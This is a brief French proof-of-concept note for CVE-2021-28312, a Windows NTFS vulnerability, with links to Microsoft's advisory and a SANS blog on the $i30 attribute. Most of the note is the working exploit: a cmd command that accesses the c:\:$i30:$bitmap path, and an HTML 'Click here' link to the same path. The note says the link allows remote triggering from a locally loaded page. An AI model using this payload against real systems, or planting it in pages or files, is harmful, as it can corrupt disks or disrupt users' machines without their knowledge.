
POC et description pour CVE-2021-28312
POC et description pour CVE-2021-28312
Lien: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
Depuis cmd : tapez la commande suivante cd c:\:$i30:$bitmap
Possibilité d'exploitation à distance : peut être réalisée en ajoutant le lien suivant sur une page chargée localement
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
Détails sur l'attribut $i30 : https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/